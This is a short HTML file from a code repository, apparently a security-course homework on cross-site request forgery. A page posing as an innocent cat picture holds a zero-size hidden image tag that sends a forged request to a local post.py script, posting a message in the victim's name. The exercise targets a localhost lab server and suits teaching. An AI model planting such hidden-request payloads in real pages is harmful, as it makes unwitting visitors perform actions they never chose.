summaryrefslogtreecommitdiff
path: root/hw4/csrf.html
blob: 3e8cdaeb45207d4ccf532e078508b96aaf78cd97 (plain) (blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<title> Innocent page </title>
<body>
<h2>This is innocent page, here is a picture of a cute cat: </h2> <br>

<img src="cat.jpg">

<!-- Insert your CSRF attack here. For example you can use another hidden <img> to
generate an HTTP request to post.py to write something from victim -->

<img src="http://127.0.0.1:8000/cgi-bin/post.py?message=i%20am%20not%20l33t" width="0" height="0" border="0">

</body>
</html>